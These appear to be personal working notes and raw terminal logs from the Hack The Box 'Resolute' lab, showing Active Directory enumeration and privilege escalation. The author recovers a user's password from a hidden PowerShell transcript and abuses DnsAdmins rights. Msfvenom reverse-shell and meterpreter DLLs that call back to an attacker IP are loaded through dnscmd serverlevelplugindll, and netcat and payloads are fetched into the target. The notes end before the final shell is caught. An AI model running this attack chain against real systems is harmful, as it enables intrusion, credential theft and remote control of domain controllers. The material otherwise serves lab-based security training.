we will try winPEAS but at a glance didnt see anything glaring.will re check later
Info: Upload successful! *Evil-WinRM* PS C:\Users\melanie\Documents> ./winPEASx64.exe ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD (((((((((((((((((((((((((((((((( ((((((((((((((((((((((((((((((((((((((((((( ((((((((((((((**********/##########((((((((((((( ((((((((((((********************/#######((((((((((( ((((((((******************/@@@@@/****######(((((((((( ((((((********************@@@@@@@@@@/***,####(((((((((( (((((********************/@@@@@%@@@@/********##((((((((( (((############*********/%@@@@@@@@@/************(((((((( ((##################(/******/@@@@@/***************(((((( ((#########################(/**********************((((( ((##############################(/*****************((((( ((###################################(/************((((( ((#######################################(*********((((( ((#######(,.***.,(###################(..***.*******((((( ((#######*(#####((##################((######/(*****((((( ((###################(/***********(##############()((((( (((#####################/*******(################)(((((( ((((############################################)(((((( (((((##########################################)((((((( ((((((########################################)((((((( ((((((((####################################)(((((((( (((((((((#################################)((((((((( ((((((((((##########################)((((((((( (((((((((((((((((((((((((((((((((((((( (((((((((((((((((((((((((((((( ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission. WinPEAS-ng by @hacktricks_live /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @hacktricks_live | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ [+] Legend: Red Indicates a special privilege over an object or something is misconfigured Green Indicates that some protection is enabled or something is well configured Cyan Indicates active users Blue Indicates disabled users LightYellow Indicates links You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows
bloodhound-python
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors] └─$ bloodhound-python -u melanie -p 'Welcome123!' -ns 10.10.10.169 -d megabank.local -c all INFO: Found AD domain: megabank.local INFO: Connecting to LDAP server: Resolute.megabank.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: Resolute.megabank.local INFO: Found 27 users INFO: Found 53 groups INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: MS02.megabank.local INFO: Querying computer: Resolute.megabank.local INFO: Done in 00M 57S
will try sharphound/bloodhound
*Evil-WinRM* PS C:\Users\melanie\Documents> ./SharpHound.exe ----------------------------------------------- Initializing SharpHound at 7:57 AM on 9/16/2023 ----------------------------------------------- Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container [+] Creating Schema map for domain MEGABANK.LOCAL using path CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL [+] Cache File not Found: 0 Objects in cache [+] Pre-populating Domain Controller SIDS Status: 0 objects finished (+0) -- Using 19 MB RAM Status: 88 objects finished (+88 ì)/s -- Using 27 MB RAM Enumeration finished in 00:00:00.4523615 Compressing data to .\20230916075709_BloodHound.zip You can upload this file directly to the UI SharpHound Enumeration Completed at 7:57 AM on 9/16/2023! Happy Graphing! *Evil-WinRM* PS C:\Users\melanie\Documents> ls Directory: C:\Users\melanie\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 7:57 AM 10694 20230916075709_BloodHound.zip -a---- 9/16/2023 7:57 AM 15793 NGFkZWM1ODktZGZiMS00YWJmLTk0OTMtMTFkMTllMjIxYmUx.bin -a---- 9/16/2023 7:56 AM 833536 SharpHound.exe -a---- 9/16/2023 7:39 AM 2387968 winPEASx64.exe *Evil-WinRM* PS C:\Users\melanie\Documents> download 20230916075709_BloodHound.zip Info: Downloading C:\Users\melanie\Documents\20230916075709_BloodHound.zip to 20230916075709_BloodHound.zip Info: Download successful! *Evil-WinRM* PS C:\Users\melanie\Documents>
tried aclpwn but no luck
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64] └─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Welcome123!' [!] No path found! ┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64] └─$
reviewing winpeas again and saw some hidden directories as
C:\Users\Default C:\Users\DefaultUser C:\Users\Default C:\Users\All Users
ÉÍÍÍÍÍÍÍÍÍ͹ Looking inside the Recycle Bin for creds files È https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files Not Found ÉÍÍÍÍÍÍÍÍÍ͹ Searching hidden files or folders in C:\Users home (can be slow) C:\Users\Default C:\Users\Default User C:\Users\Default C:\Users\All Users ÉÍÍÍÍÍÍÍÍÍ͹ Searching interesting files in other users home directories (can be slow)
checking all of these folders and we download NTUSER.dat,
*Evil-WinRM* PS C:\Users\Default> ls Directory: C:\Users\Default Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 7/16/2016 6:18 AM Desktop d-r--- 9/25/2019 10:17 AM Documents d-r--- 7/16/2016 6:18 AM Downloads d-r--- 7/16/2016 6:18 AM Favorites d-r--- 7/16/2016 6:18 AM Links d-r--- 7/16/2016 6:18 AM Music d-r--- 7/16/2016 6:18 AM Pictures d----- 7/16/2016 6:18 AM Saved Games d-r--- 7/16/2016 6:18 AM Videos -a---- 12/4/2019 5:17 AM 262144 NTUSER.DAT *Evil-WinRM* PS C:\Users\Default> cd Documents *Evil-WinRM* PS C:\Users\Default\Documents> ls *Evil-WinRM* PS C:\Users\Default\Documents> cd C:\Users\"All Users" *Evil-WinRM* PS C:\Users\All Users> ls Directory: C:\Users\All Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 11/20/2016 6:36 PM Microsoft d----- 9/25/2019 10:48 AM Package Cache d----- 9/25/2019 10:17 AM regid.1991-06.com.microsoft d----- 7/16/2016 6:18 AM SoftwareDistribution d----- 11/20/2016 6:19 PM USOPrivate d----- 11/20/2016 6:19 PM USOShared d----- 9/25/2019 10:48 AM VMware *Evil-WinRM* PS C:\Users\All Users> cd VMware *Evil-WinRM* PS C:\Users\All Users\VMware> ls Directory: C:\Users\All Users\VMware Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 9/25/2019 10:48 AM VMware CAF d----- 9/25/2019 10:49 AM VMware Tools d----- 9/25/2019 10:48 AM VMware VGAuth *Evil-WinRM* PS C:\Users\All Users\VMware> cd ---- ------------- ------ ---- ^C Warning: Press "y" to exit, press any other key to continue *Evil-WinRM* PS C:\Users\All Users\VMware> cd C:\Users\"Default User" *Evil-WinRM* PS C:\Users\Default User> ls Access to the path 'C:\Users\Default User' is denied. At line:1 char:1 + ls + ~~ + CategoryInfo : PermissionDenied: (C:\Users\Default User:String) [Get-ChildItem], UnauthorizedAccessException + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand *Evil-WinRM* PS C:\Users\Default User>
wild goose chase with trying to enumerate NTUSER.DAT.. so gave up after trying
┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins] └─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser Parsed Plugins file. Error in : Can't locate plugins/.pl in @INC (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl line 199. complete. ---------------------------------------- ┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins] └─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser
Viewing hidden files via the powershell commands. We run it in C:/
Get-ChildItem -Hidden or gci -Hidden ls -a
*Evil-WinRM* PS C:\> Get-ChildItem -Hidden Directory: C:\ Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hs- 9/16/2023 7:41 AM $RECYCLE.BIN d--hsl 9/25/2019 10:17 AM Documents and Settings d--h-- 9/25/2019 10:48 AM ProgramData d--h-- 12/3/2019 6:32 AM PSTranscripts d--hs- 9/25/2019 10:17 AM Recovery d--hs- 9/25/2019 6:25 AM System Volume Information -arhs- 11/20/2016 5:59 PM 389408 bootmgr -a-hs- 7/16/2016 6:10 AM 1 BOOTNXT -a-hs- 9/16/2023 7:31 AM 402653184 pagefile.sys *Evil-WinRM* PS C:\>
we check inside PSTranscripts but there is nothing so we check for hidden files here and we find one which i download to kal
which also contains nothing so we also check hidden files here and we find "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt"*Evil-WinRM* PS C:\> cd PSTranscripts *Evil-WinRM* PS C:\PSTranscripts> ls *Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Hidden Directory: C:\PSTranscripts Mode LastWriteTime Length Name ---- ------------- ------ ---- d--h-- 12/3/2019 6:45 AM 20191203 *Evil-WinRM* PS C:\PSTranscripts> *Evil-WinRM* PS C:\PSTranscripts> download 20191203 Info: Downloading C:\PSTranscripts\20191203 to 20191203 Info: Download successful! *Evil-WinRM* PS C:\PSTranscripts> Directory: C:\PSTranscripts\20191203 Mode LastWriteTime Length Name ---- ------------- ------ ---- -arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt *Evil-WinRM* PS C:\PSTranscripts\20191203> download PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError rescue EstandardError => err ^^^^^^^^^^^^^^ Did you mean? StandardError *Evil-WinRM* PS C:\PSTranscripts\20191203> download "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt" Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError rescue EstandardError => err ^^^^^^^^^^^^^^ Did you mean? StandardError *Evil-WinRM* PS C:\PSTranscripts\20191203> cat powerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt **********************
we find some password for ryan Serv3r4Admin4cc123!
PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 **********************
``
enumerate ryan┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!" dquote> ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!) ┌──(kali㉿kali)-[~] └─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! --shares SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True) SMB 10.10.10.169 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!) SMB 10.10.10.169 445 RESOLUTE [+] Enumerated shares SMB 10.10.10.169 445 RESOLUTE Share Permissions Remark SMB 10.10.10.169 445 RESOLUTE ----- ----------- ------ SMB 10.10.10.169 445 RESOLUTE ADMIN$ Remote Admin SMB 10.10.10.169 445 RESOLUTE C$ Default share SMB 10.10.10.169 445 RESOLUTE IPC$ Remote IPC SMB 10.10.10.169 445 RESOLUTE NETLOGON READ Logon server share SMB 10.10.10.169 445 RESOLUTE SYSVOL READ Logon server share
tried aclpwn again
┌──(kali㉿kali)-[~] └─$ ~/.local/bin/aclpwn -f [email protected] -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Serv3r4Admin4cc123!' [!] No path found! ┌──(kali㉿kali)-[~] └─$
group membership - *Domain Users *Contractors
*Evil-WinRM* PS C:\Users\ryan\Documents> net user /domain ryan User name ryan Full Name Ryan Bertrand Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 9/16/2023 9:27:02 AM Password expires Never Password changeable 9/17/2023 9:27:02 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *Contractors The command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
check more information using whoami /all . Noted that this gives more infor.we can see DNSadmin
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all USER INFORMATION ---------------- User Name SID ============= ============================================== megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Found some instructions to exploit as DNSadmin
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your_IP> LPORT=<Your_Port> -f dll > malicious.dll Upload to the machine run the following command to reconfigure the DNS dnscmd <ServerName> /config /serverlevelplugindll <Path_to_malicious_DLL> restart the DNS service net stop "DNS Server" net start "DNS Server" This may not work in evil-winrm so better to do via reverse shell
steps
┌──(kali㉿kali)-[~/HTB/resolute] └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > malicious.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute] └─$ nc -nlvp 444 listening on [any] 444 ...
on kali
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
Tried to restart DNS but failed due to permisions
*Evil-WinRM* PS C:\Users\ryan\Documents> Restart-Service -Name 'DNS Server' 'Cannot access dependent services of 'DNS Server (DNS)' At line:1 char:1 + Restart-Service -Name 'DNS Server' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException + FullyQualifiedErrorId : CouldNotAccessDependentServices,Microsoft.PowerShell.Commands.RestartServiceCommand Service 'DNS Server (DNS)' cannot be stopped due to the following error: Cannot open DNS service on computer '.'. At line:1 char:1 + Restart-Service -Name 'DNS Server' + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service], ServiceCommandException + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll
Read that this may be an issue with evil-winrm. Will try do a reverse so i can run from my computer
setting up and running the reverse shell
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o shell.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of exe file: 7168 bytes Saved as: shell.exe ┌──(kali㉿kali)-[~/HTB/resolute]
Warning: Press "y" to exit, press any other key to continue *Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell.exe Info: Uploading /home/kali/HTB/resolute/shell.exe to C:\Users\ryan\Documents\shell.exe Data: 9556 bytes of 9556 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe
exe failed
*Evil-WinRM* PS C:\Users\ryan\Documents> ./shell.exe Program 'shell.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1 + ./shell.exe + ~~~~~~~~~~~. At line:1 char:1 + ./shell.exe + ~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException + FullyQualifiedErrorId : NativeCommandFailed *Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/shell2.exe
will try dll but kept failing
Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe path\to\shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe ./shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents> pwd Path ---- C:\Users\ryan\Documents *Evil-WinRM* PS C:\Users\ryan\Documents> rundll32.exe C:\Users\ryan\Documents\shell_x64.dll,DllMain *Evil-WinRM* PS C:\Users\ryan\Documents>
I found a way to restart the dns via -- sc.exe
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 3 STOP_PENDING (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x7530 *Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns SERVICE_NAME: dns TYPE : 10 WIN32_OWN_PROCESS STATE : 2 START_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x1 WAIT_HINT : 0x4e20 PID : 3308 FLAGS : *Evil-WinRM* PS C:\Users\ryan\Documents>
Aftert research, found that the dll we create will not work and we need t o create one that is
windows/x64/exec
module1. You'll use the `windows/x64/exec` payload with the `CMD` option to run your desired command upon successful exploitation. If you wish to run a reverse shell, you can leverage something like `nc.exe` (netcat). 2. The following command will generate a DLL that, when loaded, will execute the specified command (in this case, a reverse shell using netcat):
msfvenom -p windows/x64/exec CMD="C:\path\to\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious.dll
msfvenom -p windows/x64/exec CMD="C:\\path\\to\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll
copying and uploading nc.exe
┌──(kali㉿kali)-[~/HTB/resolute] └─$ locate nc.exe /usr/share/windows-resources/binaries/nc.exe ┌──(kali㉿kali)-[~/HTB/resolute] └─$ cp /usr/share/windows-resources/binaries/nc.exe ~/HTB/resolute ┌──(kali㉿kali)-[~/HTB/resolute] └─$
*Evil-WinRM* PS C:\Users\ryan\Documents> upload /home/kali/HTB/resolute/nc.exe Info: Uploading /home/kali/HTB/resolute/nc.exe to C:\Users\ryan\Documents\nc.exe Data: 79188 bytes of 79188 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\ryan\Documents>
msfvenom
┌──(kali㉿kali)-[~/HTB/resolute] └─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc.exe 10.10.14.20 444 -e cmd.exe" -f dll > malicious2.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 325 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute] └─$
load the dll using the dns service
dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll C:\Users\ryan\Documents\malicious2.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
Ran and this filed. realised all dll and exe are 0 bytes buth other files upload ok
*Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll
will rename the dll to txt then upload the rename - malicious2.txt but still showing zeo
*Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll
we try a different method to upload the file i.e powershell -- invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing
kali
kali㉿kali)-[~/HTB/resolute] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.10.169 - - [16/Sep/2023 14:06:14] "GET /malicious6.dll HTTP/1.1" 200 -
host machine
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/malicious6.dll -OutFile malicious6.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 11:02 AM 0 again.txt -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 11:15 AM 9216 malicious6.dll -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll -a---- 9/16/2023 11:00 AM 0 tt.txt
load into dns -- dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd . /config /serverlevelplugindll C:\Users\ryan\Documents\malicious6.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents>
reverse shell fails again.will try with x64 version of ncat 64 bit i found here - https://github.com/int0x33/nc.exe/
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/nc64.exe -OutFile nc64.exe -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/dnshack.dll -OutFile dnshack.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> ls Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/16/2023 11:02 AM 0 again.txt -a---- 9/16/2023 11:26 AM 9216 dnshack.dll -a---- 9/16/2023 9:48 AM 0 malicious.dll -a---- 9/16/2023 10:46 AM 0 malicious2.dll -a---- 9/16/2023 10:59 AM 0 malicious2.txt -a---- 9/16/2023 10:42 AM 59392 nc.exe -a---- 9/16/2023 11:25 AM 45272 nc64.exe -a---- 9/16/2023 10:05 AM 0 pwned.dll -a---- 9/16/2023 10:56 AM 959 resolute.gnmap -a---- 9/16/2023 10:12 AM 0 shell.exe -a---- 9/16/2023 10:14 AM 53624 shell2.exe -a---- 9/16/2023 10:19 AM 0 shell_x64.dll -a---- 9/16/2023 11:00 AM 0 tt.txt *Evil-WinRM* PS C:\Users\ryan\Documents>
kali msfvenom
└─$ msfvenom -p windows/x64/exec CMD="C:\\Users\\ryan\\Documents\\nc64.exe 10.10.14.20 444 -e cmd.exe" -f dll > dnshack.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 327 bytes Final size of dll file: 9216 bytes
load and try again but fails
We will try meterpreter payload
m -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=444 -f dll > final.dll [sudo] password for kali: [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of dll file: 9216 bytes ┌──(kali㉿kali)-[~/HTB/resolute]
upload and load and verify
*Evil-WinRM* PS C:\Users\ryan\Documents> invoke-WebRequest -Uri http://10.10.14.20:8000/final.dll -OutFile final.dll -UseBasicParsing *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe 10.10.10.169 /config /serverlevelplugindll C:\Users\ryan\Documents\final.dll Registry property serverlevelplugindll successfully reset. Command completed successfully. *Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll ServerLevelPluginDll : C:\Users\ryan\Documents\final.dll PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS PSChildName : Parameters PSDrive : HKLM PSProvider : Microsoft.PowerShell.Core\Registry *Evil-WinRM* PS C:\Users\ryan\Documents>
stop and start dns while trying to catch on kali
